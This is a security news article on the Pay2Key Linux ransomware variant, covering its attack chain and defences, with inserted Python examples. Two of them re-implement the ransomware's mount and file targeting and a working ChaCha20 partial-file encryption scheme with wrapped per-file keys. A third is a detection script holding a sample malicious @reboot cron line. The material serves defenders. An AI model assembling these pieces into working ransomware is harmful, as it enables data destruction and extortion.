CyberSecurityNews

Linux Ransomware Pay2Key Attacking Organizations' Servers, Virtualization Hosts, and Cloud Workloads


Linux has long been considered a more secure operating system than Windows, but that reputation is being tested.

A ransomware group known as Pay2Key, attributed to Iranian threat actors, has developed a Linux variant that is actively targeting organizational servers, virtualization hosts, and cloud workloads.

The malware was first detected in the wild in late August 2025, and its technical design shows that its operators built it for scale, reliability, and speed rather than stealth.

Pay2Key is not a new name in the threat landscape. The group had periods of reduced activity, but this Linux-specific variant signals a deliberate shift in targeting strategy.

Unlike traditional ransomware that focuses on desktop environments, Pay2Key’s Linux build goes straight for the infrastructure layer — the servers and systems that organizations depend on daily.

Once it gets inside, it does not just encrypt files; it systematically dismantles the defenses that might slow it down.


Morphisec researchers identified the malware sample and noted that Pay2Key.I2, the Linux variant, is configuration-driven and requires root-level privileges to execute.

This means the ransomware runs with the highest level of system access, giving it full control over the file system and core OS functions.

The operators do not rely on privilege escalation after execution; the payload is built to be launched only once root access is already in hand, so initial access and escalation happen before the ransomware is ever deployed.

The impact of this ransomware on organizations running Linux-based infrastructure is significant. Servers that host databases, application backends, and virtual machines become prime targets.

Cloud workloads, which many businesses now depend on for continuous and uninterrupted operations, are equally at risk.

The malware’s ability to classify different types of mounted file systems and selectively encrypt them means it can cause maximum damage while keeping the host operational enough to deliver a ransom demand.

The broader concern is that Linux ransomware remains one of the least documented threat categories in public security research.

High-Level Attack Chain of Pay2Key Linux Ransomware Variant (Source - Morphisec)

Pay2Key’s Linux build is a clear example of how threat actors are filling that gap — developing tools that many organizations are simply not yet prepared to defend against.

Encryption Mechanism and Defense Evasion

Before Pay2Key begins encrypting files, it first prepares the environment to ensure nothing gets in its way.

The malware stops running services, kills active processes, and disables two major Linux security frameworks — SELinux and AppArmor.

This effectively strips the host of its active security defenses before the encryption routine even starts.

To guarantee survival beyond a reboot, the malware installs a cron entry that triggers it again at system restart.

This persistence mechanism means that even if a system admin detects something wrong and reboots the server, the ransomware picks up right where it left off.

For file targeting, Pay2Key enumerates /proc/mounts to build a map of the file system. It filters out pseudo-filesystems and classifies mounts as read-only, removable, or other.

It skips read-only mounts entirely, and during per-file processing it deliberately avoids ELF and MZ binaries (Linux executables and Windows PE files, recognisable by their leading magic bytes) along with zero-length files, reducing the chance of crashing the host mid-operation.
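The mount and file triage described above, re-implemented here as an added example (this is not Morphisec's analysis code or the malware's own code) so a defender can see which of their own mounts and files the described logic would treat as targets. The pseudo-filesystem list, the /proc/mounts text and the set of removable devices are assumptions constructed for the example; the article does not publish the sample's own lists.

```python
import os
import re
from typing import List, Set, Tuple

# Assumed set of pseudo-filesystem types to ignore; the article does not
# publish the sample's own list.
PSEUDO_FS: Set[str] = {
    "proc", "sysfs", "devtmpfs", "devpts", "tmpfs", "cgroup", "cgroup2",
    "securityfs", "debugfs", "tracefs", "pstore", "bpf", "mqueue", "hugetlbfs",
    "configfs", "fusectl", "binfmt_misc", "efivarfs", "autofs", "nsfs",
}

# Constructed /proc/mounts content (not captured from a real incident).
# Format: device mountpoint fstype options dump pass; spaces in paths are \040.
SAMPLE_PROC_MOUNTS = r"""
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /run tmpfs rw,nosuid,nodev,size=812808k,mode=755 0 0
/dev/sda2 / ext4 rw,relatime 0 0
/dev/sda1 /boot ext4 ro,relatime 0 0
/dev/sdb1 /media/usb\040stick vfat rw,relatime,fmask=0022 0 0
/dev/mapper/vg-data /var/lib/libvirt/images xfs rw,relatime 0 0
nas:/exports/vmstore /mnt/vmstore nfs4 rw,relatime,vers=4.2 0 0
"""


def _unescape(field: str) -> str:
    # /proc/mounts writes space, tab, newline and backslash as 3-digit octal escapes.
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def classify_mounts(proc_mounts: str, removable_devices: Set[str]) -> List[Tuple[str, str]]:
    """Return (mountpoint, class) for every real mount, with class one of
    "read-only", "removable" or "other", the three buckets the article names.
    removable_devices is caller-supplied (on a live host: the block devices for
    which /sys/block/<dev>/removable reads "1")."""
    result: List[Tuple[str, str]] = []
    for line in proc_mounts.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        device, mountpoint, fstype, options = parts[0], _unescape(parts[1]), parts[2], parts[3]
        if fstype in PSEUDO_FS:
            continue
        if "ro" in options.split(","):
            cls = "read-only"
        elif os.path.basename(device).rstrip("0123456789") in removable_devices:
            cls = "removable"
        else:
            cls = "other"
        result.append((mountpoint, cls))
    return result


def encryption_targets(mounts: List[Tuple[str, str]]) -> List[str]:
    """Mounts the described logic would walk: everything except read-only ones."""
    return [mp for mp, cls in mounts if cls != "read-only"]


def would_encrypt(size: int, head: bytes) -> bool:
    """Per-file filter from the article: skip zero-length files and ELF
    (Linux) or MZ (Windows PE) executables, recognised by their magic bytes."""
    if size == 0:
        return False
    return not (head.startswith(b"\x7fELF") or head.startswith(b"MZ"))


def triage_path(path: str) -> bool:
    """Apply would_encrypt to a real file; reads only the first four bytes."""
    size = os.path.getsize(path)
    with open(path, "rb") as fh:
        return would_encrypt(size, fh.read(4))


if __name__ == "__main__":
    mounts = classify_mounts(SAMPLE_PROC_MOUNTS, {"sdb"})
    for mountpoint, cls in mounts:
        print(f"{cls:10} {mountpoint}")
    print("would be walked:", encryption_targets(mounts))
```

Running the block on a live host means feeding it the real /proc/mounts and the removable set derived from /sys/block; the VM image store and the NFS-backed VM store in the sample both land in "other", which is exactly the infrastructure-layer data the article says this variant goes after.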

The encryption uses the ChaCha20 algorithm in either full-file or partial mode, determined by the configuration file.

A hardcoded string, "DontDecompileMePlease", is embedded in the binary and plays a key role in both metadata key derivation and metadata layout validation.

Per-file keys are generated and stored in an obfuscated metadata block, making recovery without the decryption key practically impossible.
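An added example (not the malware's code and not Morphisec's) that illustrates the encryption design just described: ChaCha20 as specified in RFC 8439, a fresh key and nonce per file, a choice between full-file and partial mode, and a trailing metadata block that carries the per-file key. The metadata marker, field layout and the master-key wrapping of the per-file key are stand-ins assumed for the example; the sample's real layout and its use of "DontDecompileMePlease" are not reproduced.

```python
import os
import struct
from typing import Optional

MASK = 0xFFFFFFFF


def _rotl(v: int, n: int) -> int:
    return ((v << n) & MASK) | (v >> (32 - n))


def _qr(s: list, a: int, b: int, c: int, d: int) -> None:
    # ChaCha quarter round on four state words (RFC 8439 section 2.1).
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block from a 32-byte key, 32-bit counter, 12-byte nonce."""
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574,
             *struct.unpack("<8I", key), counter & MASK, *struct.unpack("<3I", nonce)]
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 column/diagonal double rounds
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK for x, y in zip(w, state)))


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 1) -> bytes:
    """Encrypt or decrypt (the same operation) by XORing data with the keystream."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(x ^ y for x, y in zip(data[off:off + 64], ks))
    return bytes(out)


def rfc8439_selfcheck() -> bool:
    """Block-function test vector from RFC 8439 section 2.3.2."""
    key, nonce = bytes(range(32)), bytes.fromhex("000000090000004a00000000")
    return chacha20_block(key, 1, nonce)[:16] == bytes.fromhex("10f1e7e4d13b5915500fdd1fa32071c4")


MARKER = b"EXAMPLE-META"  # stand-in marker assumed for this example, not the real one
META_LEN = len(MARKER) + 8 + 12 + 12 + 32  # marker, length, file nonce, meta nonce, wrapped key


def encrypt_blob(plaintext: bytes, master_key: bytes, partial_bytes: Optional[int]) -> bytes:
    """partial_bytes=None is full-file mode; an integer encrypts only that many
    leading bytes (partial mode) and leaves the remainder of the file untouched."""
    file_key, file_nonce, meta_nonce = os.urandom(32), os.urandom(12), os.urandom(12)
    n = len(plaintext) if partial_bytes is None else min(partial_bytes, len(plaintext))
    body = chacha20_xor(file_key, file_nonce, plaintext[:n]) + plaintext[n:]
    # The per-file key travels with the file but is unreadable without master_key
    # (a symmetric stand-in here; real ransomware wraps it with an attacker public key).
    wrapped_key = chacha20_xor(master_key, meta_nonce, file_key)
    meta = MARKER + struct.pack("<Q", n) + file_nonce + meta_nonce + wrapped_key
    return body + meta


def encrypted_prefix_length(blob: bytes) -> int:
    """How many leading bytes of the body were encrypted (full mode: the whole file)."""
    meta = blob[-META_LEN:]
    if not meta.startswith(MARKER):
        raise ValueError("no metadata block: not produced by encrypt_blob")
    return struct.unpack("<Q", meta[len(MARKER):len(MARKER) + 8])[0]


def decrypt_blob(blob: bytes, master_key: bytes) -> bytes:
    body, meta = blob[:-META_LEN], blob[-META_LEN:]
    n = encrypted_prefix_length(blob)
    off = len(MARKER) + 8
    file_nonce, meta_nonce, wrapped_key = meta[off:off + 12], meta[off + 12:off + 24], meta[off + 24:off + 56]
    file_key = chacha20_xor(master_key, meta_nonce, wrapped_key)
    return chacha20_xor(file_key, file_nonce, body[:n]) + body[n:]


if __name__ == "__main__":
    master = os.urandom(32)
    disk_image = os.urandom(4096)  # constructed stand-in for a large VM disk file
    partial = encrypt_blob(disk_image, master, 1024)
    print("RFC 8439 self-check:", rfc8439_selfcheck())
    print("partial mode encrypted", encrypted_prefix_length(partial), "of", len(disk_image), "bytes")
    print("round trip ok:", decrypt_blob(partial, master) == disk_image)
```

Two things the block makes concrete. Partial mode touches only the head of each file, so a multi-gigabyte VM disk is "encrypted" in milliseconds while still being unusable, which is why speed rather than stealth dominates the design. And because every file has its own key, there is nothing to brute-force per file: recovery reduces entirely to obtaining the key that protects the metadata block. Note that bare ChaCha20 provides no integrity (no Poly1305 tag); that is irrelevant to an attacker but matters if you reuse the primitive defensively.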

Security teams running Linux-based infrastructure should enforce strict controls on root-level access and audit which accounts carry elevated privileges.

Restricting which users may create cron jobs (for example through /etc/cron.allow) reduces the risk of persistence mechanisms taking hold, with the caveat that this variant already runs as root, so cron restrictions are a hardening layer around root access rather than a control that stops the malware itself; changes to /etc/crontab, /etc/cron.d and user crontabs should be monitored.

Organizations should also actively monitor for any unexpected disabling of SELinux or AppArmor (a switch to permissive mode via setenforce, edits to /etc/selinux/config, or AppArmor profiles being unloaded or its service being stopped), as this is a strong indicator of active ransomware execution.
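The following is an added example (not from the article or Morphisec) that turns the evasion and persistence behaviour described earlier, together with the monitoring recommendations above, into checks over the kernel and cron interfaces a Linux host exposes: the SELinux enforce flag, the loaded AppArmor profiles, and crontab entries. Cron's @reboot specifier is used as the "run again at restart" form to look for, which is an assumption; the article does not publish the sample's cron line. The file paths, names and contents in the sample inputs are constructed for the example.

```python
import os
import re
from typing import Dict, List, Optional

# Heuristic: directories attackers commonly stage from. Not an indicator from the article.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def check_selinux(enforce_content: Optional[str]) -> List[str]:
    """enforce_content is /sys/fs/selinux/enforce ("1" enforcing, "0" permissive),
    or None when the file is absent because SELinux is not loaded."""
    if enforce_content is None:
        return ["SELinux: not loaded (normal on AppArmor distributions, otherwise investigate)"]
    if enforce_content.strip() == "0":
        return ["SELinux: permissive (setenforce 0 or config change); confirm this was intended"]
    return []


def check_apparmor(profiles_content: Optional[str]) -> List[str]:
    """profiles_content is /sys/kernel/security/apparmor/profiles, one
    "name (mode)" line per loaded profile, or None when AppArmor is absent."""
    if profiles_content is None:
        return ["AppArmor: not loaded (normal on SELinux distributions, otherwise investigate)"]
    modes = re.findall(r"\((\w+)\)\s*$", profiles_content, flags=re.MULTILINE)
    if not modes:
        return ["AppArmor: no profiles loaded (service stopped or aa-teardown run)"]
    loose = [m for m in modes if m != "enforce"]
    if loose:
        return [f"AppArmor: {len(loose)} of {len(modes)} profiles are not in enforce mode"]
    return []


def check_cron(sources: Dict[str, str]) -> List[str]:
    """sources maps a crontab path (/etc/crontab, /etc/cron.d/*, /var/spool/cron/*)
    to its text. Flags @reboot jobs and any job referencing a staging directory."""
    findings: List[str] = []
    for path, text in sources.items():
        for lineno, raw in enumerate(text.splitlines(), 1):
            line = raw.strip()
            if not line or line.startswith("#") or "=" in line.split()[0]:
                continue  # blank line, comment or NAME=value assignment
            reasons = []
            if line.startswith("@reboot"):
                reasons.append("@reboot persistence")
            if any(d in line for d in STAGING_DIRS):
                reasons.append("runs from a staging directory")
            if reasons:
                findings.append(f"cron: {path}:{lineno} ({', '.join(reasons)}): {line}")
    return findings


def audit_host(selinux_enforce: Optional[str], apparmor_profiles: Optional[str],
               crontabs: Dict[str, str]) -> List[str]:
    return check_selinux(selinux_enforce) + check_apparmor(apparmor_profiles) + check_cron(crontabs)


def _read(path: str) -> Optional[str]:
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return None


def audit_live_host() -> List[str]:
    """Collect the real inputs from this host; needs root to read user crontabs."""
    sources: Dict[str, str] = {}
    for directory in ("/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs"):
        if os.path.isdir(directory):
            for name in os.listdir(directory):
                text = _read(os.path.join(directory, name))
                if text is not None:
                    sources[os.path.join(directory, name)] = text
    etc_crontab = _read("/etc/crontab")
    if etc_crontab is not None:
        sources["/etc/crontab"] = etc_crontab
    return audit_host(_read("/sys/fs/selinux/enforce"),
                      _read("/sys/kernel/security/apparmor/profiles"), sources)


# Constructed inputs (paths and names invented for the example, not from the article).
SAMPLE_SELINUX_ENFORCE = "0\n"
SAMPLE_APPARMOR_PROFILES = ""  # file present but empty: every profile has been unloaded
SAMPLE_CRONTABS = {
    "/etc/crontab": "SHELL=/bin/sh\nPATH=/usr/sbin:/usr/bin:/sbin:/bin\n"
                    "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n",
    "/etc/cron.d/sysupdate": "# added by installer\n"
                             "@reboot root /var/tmp/.cache/sysupdate --config /var/tmp/.cache/c.json\n",
}

if __name__ == "__main__":
    for finding in audit_host(SAMPLE_SELINUX_ENFORCE, SAMPLE_APPARMOR_PROFILES, SAMPLE_CRONTABS):
        print(finding)
```

Run audit_live_host() from a scheduled job or your EDR's custom-script channel and alert on any non-empty result; a host where SELinux flips to permissive and the AppArmor profile list empties in the same minute as a new @reboot job appearing matches the preparation sequence the article describes and should be treated as an active incident, not a configuration drift ticket.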

Maintaining offline, immutable backups of critical data remains one of the most effective ways to recover without paying a ransom.
